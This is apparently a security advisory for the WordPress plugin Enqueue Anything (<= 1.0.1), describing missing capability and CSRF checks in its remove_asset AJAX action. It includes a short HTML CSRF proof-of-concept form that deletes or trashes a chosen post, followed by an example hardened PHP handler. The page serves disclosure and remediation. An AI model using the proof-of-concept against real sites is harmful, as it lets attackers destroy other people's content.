wpexploit - Abhishek Bhoir - WPEX-ID: 140A15B6-12C8-4F03-A877-3876DB866852
History: May 17, 2022 - 12:00 a.m.

Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion


EPSS: 0.001 (Low), percentile 21.2%

The plugin does not have authorisation and CSRF checks in the remove_asset AJAX action, and does not ensure that the item to be deleted is actually an asset. As a result, low privilege users such as subscribers could delete arbitrary assets, as well as put arbitrary posts in the trash. Version 1.0.1 added a check to ensure the post to be removed is an asset; however, the plugin is still missing capability and CSRF checks.

As a subscriber, or via CSRF against any authenticated user:
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="remove&#95;asset" />
      <input type="hidden" name="id" value="289" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
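The three missing controls described above (nonce check, capability check, post type check) as they would look in a hardened remove_asset handler. This is an added example written for this page, not the plugin's own code; the post type name 'ea_asset', the nonce action 'ea_remove_asset', the script handle 'ea-admin' and the choice of manage_options as the required capability are assumptions, not values from the advisory.

```php
<?php
// Assumed names (not from the advisory); replace with the plugin's real values.
define( 'EA_ASSET_POST_TYPE', 'ea_asset' );     // assumed custom post type for assets
define( 'EA_REMOVE_NONCE', 'ea_remove_asset' );  // assumed nonce action name

function ea_remove_asset_handler() {
    // CSRF: require a valid nonce in the 'nonce' POST field. A cross-site form
    // like the one in the PoC cannot supply it, so check_ajax_referer() dies.
    check_ajax_referer( EA_REMOVE_NONCE, 'nonce' );

    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( 'missing id', 400 );
    }

    // Authorisation: subscribers must not reach this point. manage_options
    // (administrators) is the assumed capability for managing enqueued assets;
    // delete_post on the specific ID keeps WordPress's per-post checks in play.
    if ( ! current_user_can( 'manage_options' ) || ! current_user_can( 'delete_post', $id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Type check (the part v1.0.1 added): only the plugin's own asset posts may
    // be removed, so arbitrary posts or pages cannot be trashed via this action.
    if ( get_post_type( $id ) !== EA_ASSET_POST_TYPE ) {
        wp_send_json_error( 'not an asset', 400 );
    }

    if ( ! wp_delete_post( $id, true ) ) {
        wp_send_json_error( 'delete failed', 500 );
    }
    wp_send_json_success( array( 'id' => $id ) );
}
// Logged-in users only: deliberately no wp_ajax_nopriv_remove_asset registration.
add_action( 'wp_ajax_remove_asset', 'ea_remove_asset_handler' );

// Hand the nonce to the plugin's admin-page script so legitimate requests can
// include it; 'ea-admin' is an assumed, already-registered script handle.
function ea_localize_admin_script() {
    wp_localize_script( 'ea-admin', 'eaAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( EA_REMOVE_NONCE ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'ea_localize_admin_script' );
```

With these checks in place the PoC form fails at the nonce check before any post lookup happens, and a subscriber's own AJAX call is rejected with 403.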

